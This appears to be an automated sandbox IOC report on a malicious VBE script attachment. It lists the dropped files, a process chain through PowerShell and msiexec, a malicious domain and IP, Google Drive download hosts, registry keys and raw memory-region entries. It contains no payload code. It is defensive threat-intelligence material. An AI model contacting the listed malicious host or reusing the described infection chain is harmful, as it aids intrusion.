IOC Report
EL-25-536_40005512_Le Cuivre_23102024.vbe


Files

| File Path | Type | Category | Malicious |
| --- | --- | --- | --- |
| EL-25-536_40005512_Le Cuivre_23102024.vbe | ASCII text, with CRLF line terminators | initial sample | malicious |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified | |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnwyp1oa.1ro.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egwlo1hl.0vg.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prnakv1v.obv.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3fwfsdu.inh.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Roaming\Gesjftigere.Sig | ASCII text, with very long lines (65536), with no line terminators | dropped | |

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\EL-25-536_40005512_Le Cuivre_23102024.vbe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe
"C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe"
malicious
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\SysWOW64\dllhost.exe"
malicious
C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe
"C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs


Domains

| Name | IP | Malicious |
| --- | --- | --- |
| www.akkushaber.xyz | 104.21.70.11 | malicious |
| drive.google.com | 142.250.185.78 | |
| drive.usercontent.google.com | 142.250.186.97 | |

IPs

| IP | Domain | Country | Malicious |
| --- | --- | --- | --- |
| 104.21.70.11 | www.akkushaber.xyz | United States | malicious |
| 142.250.185.78 | drive.google.com | United States | |
| 142.250.185.142 | unknown | United States | |
| 142.250.186.97 | drive.usercontent.google.com | United States | |

Registry

| Path | Value | Malicious |
| --- | --- | --- |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | |

Memdumps

page read and write
7A2E000
stack
page read and write
17734A67000
heap
page read and write
24B24625000
heap
page read and write
3154000
heap
page read and write
821000
unkown
page execute read
3284000
heap
page read and write
17736943000
heap
page read and write
3460000
trusted library section
page read and write
17734980000
heap
page read and write
5283000
unkown
page execute and read and write
9300000
direct allocation
page execute and read and write
3282000
heap
page read and write
4BC0000
trusted library allocation
page execute and read and write
24B3E4C0000
heap
page read and write
8520000
trusted library allocation
page read and write
1FF9E000
stack
page read and write
1FDDE000
stack
page read and write
17734A15000
heap
page read and write
73BE000
stack
page read and write
A58000
heap
page read and write
177349EE000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
2D95000
heap
page read and write
236C3000
unclassified section
page execute and read and write
4F1000
unkown
page read and write
32AE000
stack
page read and write
7A70000
trusted library allocation
page read and write
BC3000
system
page execute and read and write
2DA000
stack
page read and write
250000
unkown
page readonly
17736992000
heap
page read and write
76EF000
stack
page read and write
177349E6000
heap
page read and write
720000
unkown
page read and write
8830000
heap
page read and write
7860000
heap
page read and write
35C0000
heap
page read and write
3170000
heap
page read and write
4CA0000
heap
page read and write
73FB000
stack
page read and write
3471000
heap
page read and write
2DEE000
stack
page read and write
24B27CDD000
trusted library allocation
page read and write
17736910000
heap
page read and write
3471000
heap
page read and write
8620000
trusted library allocation
page read and write
E60000
unkown
page readonly
17734A77000
heap
page read and write
2540000
heap
page read and write
17734A4C000
heap
page read and write
7FFD9B8E0000
trusted library allocation
page read and write
17736992000
heap
page read and write
3471000
heap
page read and write
821000
unkown
page execute read
20550000
direct allocation
page execute and read and write
4AE0000
heap
page read and write
835000
unkown
page read and write
5DE9000
trusted library allocation
page read and write
177349AC000
heap
page read and write
38F9000
direct allocation
page execute and read and write
4AC9000
trusted library allocation
page read and write
24B27C56000
trusted library allocation
page read and write
8D0000
heap
page read and write
7F970000
trusted library allocation
page execute and read and write
4C00000
direct allocation
page read and write
3471000
heap
page read and write
3471000
heap
page read and write
177349AD000
heap
page read and write
866E000
trusted library allocation
page read and write
24B268D7000
trusted library allocation
page read and write
8610000
trusted library allocation
page read and write
3570000
heap
page read and write
4C9E000
stack
page read and write
79AE000
stack
page read and write
8BC0000
direct allocation
page read and write
24B241E0000
heap
page read and write
252E000
stack
page read and write
72D0000
direct allocation
page read and write
78DD000
heap
page read and write
17734B05000
heap
page read and write
3412000
unkown
page execute and read and write
218C3000
unclassified section
page execute and read and write
3154000
heap
page read and write
24B3E57F000
heap
page read and write
3570000
trusted library allocation
page read and write
2540000
heap
page read and write
24B263B2000
trusted library allocation
page read and write
206EE000
direct allocation
page execute and read and write
78F6000
heap
page read and write
2544000
heap
page read and write
717F000
stack
page read and write
9C0000
unkown
page readonly
7FFD9B900000
trusted library allocation
page read and write
24B25C50000
trusted library allocation
page read and write
4D5E000
stack
page read and write
17736EF0000
heap
page read and write
7910000
heap
page execute and read and write
A7D1000
direct allocation
page execute and read and write
7FFD9B840000
trusted library allocation
page read and write
17736DD0000
heap
page read and write
4B90000
direct allocation
page read and write
781000
unkown
page readonly
3471000
heap
page read and write
68BD000
stack
page read and write
201F9000
heap
page read and write
810000
unkown
page read and write
17736992000
heap
page read and write
4C40000
heap
page read and write
7FFD9B6EC000
trusted library allocation
page execute and read and write
8B8C000
stack
page read and write
8B4E000
stack
page read and write
177349F1000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7480000
heap
page read and write
4CFF000
heap
page read and write
24B3E3E4000
heap
page read and write
7FFD9B6F0000
trusted library allocation
page execute and read and write
200D0000
remote allocation
page read and write
32A2000
heap
page read and write
4B70000
direct allocation
page read and write
17734A25000
heap
page read and write
17734A43000
heap
page read and write
24B35ED1000
trusted library allocation
page read and write
7FFD9B8D0000
trusted library allocation
page read and write
33AE000
unkown
page read and write
7875000
heap
page read and write
7A90000
trusted library allocation
page read and write
3471000
heap
page read and write
4AD0000
direct allocation
page read and write
3E3C000
unclassified section
page read and write
24B242E6000
heap
page read and write
30095FE000
stack
page read and write
17736992000
heap
page read and write
950000
direct allocation
page read and write
7FFD9B8B0000
trusted library allocation
page read and write
CC102F9000
stack
page read and write
24B3E700000
heap
page read and write
17736913000
heap
page read and write
38D1000
remote allocation
page execute and read and write
7A80000
trusted library allocation
page read and write
1FF1E000
stack
page read and write
4AE2000
trusted library allocation
page read and write
396E000
direct allocation
page execute and read and write
5E27000
trusted library allocation
page read and write
77C000
stack
page read and write
4883000
unkown
page execute and read and write
24B3E3E0000
heap
page read and write
7928000
trusted library allocation
page read and write
17736800000
heap
page read and write
17734A19000
heap
page read and write
3B20000
trusted library allocation
page read and write
24B3E2FE000
heap
page read and write
882B000
stack
page read and write
177349F4000
heap
page read and write
208A0000
unclassified section
page execute and read and write
3150000
heap
page read and write
1773693B000
heap
page read and write
4CFA000
heap
page read and write
4CB9000
heap
page read and write
24B25C80000
trusted library allocation
page read and write
24B3E282000
heap
page read and write
4CDE000
stack
page read and write
2BE0000
direct allocation
page read and write
4E4C000
stack
page read and write
FE0000
unkown
page readonly
177349EC000
heap
page read and write
3F0000
unkown
page readonly
2DA0000
heap
page read and write
2081D000
direct allocation
page execute and read and write
4AE5000
heap
page read and write
8C30000
trusted library allocation
page execute and read and write
2B70000
heap
page read and write
24B274E8000
trusted library allocation
page read and write
52E4000
trusted library allocation
page read and write
7FFD9B750000
trusted library allocation
page execute and read and write
17734A4E000
heap
page read and write
177349FD000
heap
page read and write
24B260D8000
trusted library allocation
page read and write
270000
unkown
page readonly
24B26337000
trusted library allocation
page read and write
A50000
heap
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
4CF9000
heap
page read and write
891A000
heap
page read and write
177349E6000
heap
page read and write
1773692E000
heap
page read and write
3440000
heap
page read and write
17734A12000
heap
page read and write
17734A43000
heap
page read and write
17736923000
heap
page read and write
72B0000
direct allocation
page read and write
7FFD9B630000
trusted library allocation
page read and write
CC106BF000
stack
page read and write
291C000
unkown
page read and write
4AB0000
trusted library allocation
page read and write
720000
unkown
page read and write
17736917000
heap
page read and write
821000
unkown
page execute read
20821000
direct allocation
page execute and read and write
212A0000
unclassified section
page execute and read and write
307C000
stack
page read and write
24B2635B000
trusted library allocation
page read and write
3471000
heap
page read and write
965000
heap
page read and write
24B26ADA000
trusted library allocation
page read and write
835000
unkown
page read and write
3471000
heap
page read and write
7FFD9B812000
trusted library allocation
page read and write
8AF0000
trusted library allocation
page execute and read and write
7FFD9B890000
trusted library allocation
page read and write
3471000
heap
page read and write
3095000
heap
page read and write
3DC000
stack
page read and write
766E000
stack
page read and write
37BF000
heap
page read and write
C1A000
system
page execute and read and write
4CBF000
heap
page read and write
1773692D000
heap
page read and write
8D8000
heap
page read and write
1773691D000
heap
page read and write
7D0000
unkown
page readonly
8F3000
heap
page read and write
24B24310000
heap
page read and write
7E0000
heap
page read and write
630000
unkown
page readonly
CC1017E000
stack
page read and write
346F000
stack
page read and write
3473000
heap
page read and write
CC1073B000
stack
page read and write
2031C000
heap
page read and write
4AA0000
trusted library allocation
page read and write
4C59000
heap
page read and write
630000
unkown
page readonly
CC1118E000
stack
page read and write
177349E9000
heap
page read and write
17736B2B000
heap
page read and write
4BD0000
direct allocation
page read and write
1FFDF000
stack
page read and write
17736992000
heap
page read and write
CC104B8000
stack
page read and write
800000
unkown
page readonly
24B35EC0000
trusted library allocation
page read and write
7FFD9B64B000
trusted library allocation
page read and write
30D5000
heap
page read and write
1773691E000
heap
page read and write
30094FF000
stack
page read and write
3471000
heap
page read and write
17734A0E000
heap
page read and write
7AF0000
trusted library allocation
page read and write
17736992000
heap
page read and write
640000
heap
page read and write
8907000
heap
page read and write
4CBF000
heap
page read and write
2E60000
unkown
page execute and read and write
2DF0000
heap
page read and write
24B266E2000
trusted library allocation
page read and write
2550000
unkown
page readonly
7FFD9B930000
trusted library allocation
page read and write
1FE9C000
stack
page read and write
7A0000
unkown
page read and write
8600000
trusted library allocation
page read and write
4C9E000
heap
page read and write
1FE5E000
stack
page read and write
3471000
heap
page read and write
7FFD9B632000
trusted library allocation
page read and write
4D1F000
stack
page read and write
8D8000
heap
page read and write
610000
unkown
page readonly
CC1130B000
stack
page read and write
7E0000
heap
page read and write
3470000
heap
page read and write
24B25C40000
heap
page readonly
CC0FDFF000
stack
page read and write
7920000
trusted library allocation
page read and write
17736912000
heap
page read and write
2D18000
stack
page read and write
720D000
stack
page read and write
8BE0000
direct allocation
page read and write
7290000
direct allocation
page read and write
814000
heap
page read and write
17736992000
heap
page read and write
17736420000
heap
page read and write
374E000
heap
page read and write
24B3E4FA000
heap
page read and write
17736992000
heap
page read and write
7B0000
unkown
page readonly
9C0000
unkown
page readonly
24B24315000
heap
page read and write
30BB000
stack
page read and write
17736952000
heap
page read and write
30090FE000
stack
page read and write
72E0000
direct allocation
page read and write
8630000
trusted library allocation
page read and write
B9E000
system
page execute and read and write
17736936000
heap
page read and write
177349AE000
heap
page read and write
7F0000
unkown
page read and write
24B2634A000
trusted library allocation
page read and write
835000
unkown
page read and write
30E2000
heap
page read and write
24B26AE8000
trusted library allocation
page read and write
747B000
stack
page read and write
4CFC000
heap
page read and write
24B3E3B7000
heap
page execute and read and write
837000
unkown
page readonly
3720000
trusted library allocation
page execute and read and write
24B27C34000
trusted library allocation
page read and write
177349B0000
heap
page read and write
CC1110E000
stack
page read and write
800000
unkown
page readonly
837000
unkown
page readonly
8B00000
trusted library allocation
page read and write
7C0000
unkown
page readonly
24B26370000
trusted library allocation
page read and write
250000
unkown
page readonly
30099FB000
stack
page read and write
7950000
trusted library allocation
page read and write
24B3E248000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
600000
unkown
page readonly
72F0000
direct allocation
page read and write
727B000
stack
page read and write
CC1007E000
stack
page read and write
30093FF000
stack
page read and write
17736CC1000
heap
page read and write
1FEDE000
stack
page read and write
84F7000
stack
page read and write
860000
unkown
page read and write
85AF000
stack
page read and write
7235000
heap
page execute and read and write
4C50000
heap
page read and write
7FFD9B7F0000
trusted library allocation
page execute and read and write
7FFD9B910000
trusted library allocation
page read and write
17734A43000
heap
page read and write
CC100FD000
stack
page read and write
3471000
heap
page read and write
1773694B000
heap
page read and write
3284000
heap
page read and write
30E0000
system
page execute and read and write
4DB0000
heap
page read and write
17736917000
heap
page read and write
3284000
heap
page read and write
7FFD9B850000
trusted library allocation
page read and write
7FFD9B63D000
trusted library allocation
page execute and read and write
3154000
heap
page read and write
3471000
heap
page read and write
4B90000
heap
page readonly
4D05000
heap
page read and write
17734A15000
heap
page read and write
3621000
heap
page read and write
820000
unkown
page readonly
3471000
heap
page read and write
3483000
unkown
page execute and read and write
820000
unkown
page readonly
4ABD000
trusted library allocation
page execute and read and write
7FFD9B940000
trusted library allocation
page read and write
2ED1000
remote allocation
page execute and read and write
7940000
trusted library allocation
page execute and read and write
7B0000
unkown
page readonly
7B00000
trusted library allocation
page read and write
4F19000
trusted library allocation
page read and write
1773691D000
heap
page read and write
4CB9000
heap
page read and write
17736933000
heap
page read and write
E61000
unkown
page readonly
A58000
heap
page read and write
810000
heap
page read and write
30FA000
heap
page read and write
888E000
stack
page read and write
42D1000
remote allocation
page execute and read and write
33EE000
unkown
page read and write
CC0FCF3000
stack
page read and write
67A000
stack
page read and write
3471000
heap
page read and write
4AE7000
heap
page read and write
82E000
unkown
page readonly
9F0000
unkown
page read and write
30092FF000
stack
page read and write
820000
unkown
page readonly
4AB3000
trusted library allocation
page execute and read and write
7FFD9B7E1000
trusted library allocation
page read and write
24B25D40000
heap
page read and write
17734A43000
heap
page read and write
4CB9000
heap
page read and write
3471000
heap
page read and write
17736992000
heap
page read and write
177349AA000
heap
page read and write
8BB0000
direct allocation
page read and write
24B25EA0000
heap
page execute and read and write
801000
unkown
page readonly
5C83000
unkown
page execute and read and write
24B26AE2000
trusted library allocation
page read and write
78F2000
heap
page read and write
7C0000
unkown
page readonly
24B2657B000
trusted library allocation
page read and write
7FFD9B6E0000
trusted library allocation
page read and write
24B361A9000
trusted library allocation
page read and write
7FFD9B634000
trusted library allocation
page read and write
306D000
heap
page read and write
17734860000
heap
page read and write
17736912000
heap
page read and write
328A000
heap
page read and write
88CC000
stack
page read and write
24B25F36000
trusted library allocation
page read and write
7FFD9B7D0000
trusted library allocation
page read and write
30A1000
heap
page read and write
CC1063E000
stack
page read and write
2642000
unkown
page read and write
730000
heap
page read and write
17736919000
heap
page read and write
3008FFE000
stack
page read and write
3AA1000
direct allocation
page execute and read and write
790000
heap
page read and write
1FE1F000
stack
page read and write
20892000
direct allocation
page execute and read and write
3596000
heap
page read and write
4AE5000
trusted library allocation
page execute and read and write
24B242D1000
heap
page read and write
67A000
stack
page read and write
327B000
heap
page read and write
204CD000
heap
page read and write
24B24620000
heap
page read and write
201F0000
heap
page read and write
7DF3FEBA0000
trusted library allocation
page execute and read and write
1773691A000
heap
page read and write
7B20000
trusted library allocation
page read and write
4E24000
trusted library allocation
page read and write
260000
unkown
page readonly
270000
unkown
page readonly
85E0000
heap
page read and write
4AB4000
trusted library allocation
page read and write
17734A1D000
heap
page read and write
7930000
trusted library allocation
page read and write
CC1033E000
stack
page read and write
24B27C4A000
trusted library allocation
page read and write
342E000
stack
page read and write
201EC000
stack
page read and write
17734A2B000
heap
page read and write
4CBF000
heap
page read and write
24B3E55E000
heap
page read and write
A6F000
heap
page read and write
4CF9000
heap
page read and write
2642000
unkown
page read and write
892A000
heap
page read and write
72C0000
direct allocation
page read and write
CC1128A000
stack
page read and write
7FFD9B640000
trusted library allocation
page read and write
4CBD000
heap
page read and write
17734A00000
heap
page read and write
4ADA000
trusted library allocation
page execute and read and write
3008EFA000
stack
page read and write
620000
unkown
page readonly
177349AB000
heap
page read and write
17736915000
heap
page read and write
4D9E000
stack
page read and write
17734A03000
heap
page read and write
3279000
heap
page read and write
24B27DE6000
trusted library allocation
page read and write
4C8C000
heap
page read and write
837000
unkown
page readonly
3B62000
unclassified section
page read and write
24B242CD000
heap
page read and write
1773694F000
heap
page read and write
240C3000
unclassified section
page execute and read and write
177349D6000
heap
page read and write
17736928000
heap
page read and write
24B3E576000
heap
page read and write
8660000
trusted library allocation
page read and write
7810000
heap
page read and write
2067D000
direct allocation
page execute and read and write
3471000
heap
page read and write
7B10000
trusted library allocation
page read and write
177349FE000
heap
page read and write
7FFD9B716000
trusted library allocation
page execute and read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B860000
trusted library allocation
page read and write
821000
unkown
page execute read
3471000
heap
page read and write
2BF0000
direct allocation
page read and write
4BB0000
direct allocation
page read and write
200D0000
remote allocation
page read and write
3471000
heap
page read and write
35D0000
trusted library allocation
page read and write
87EC000
stack
page read and write
8916000
heap
page read and write
4AE0000
trusted library allocation
page read and write
8AE0000
trusted library allocation
page read and write
24B27C30000
trusted library allocation
page read and write
4224000
unclassified section
page read and write
There are 788 hidden memdumps, click here to show them.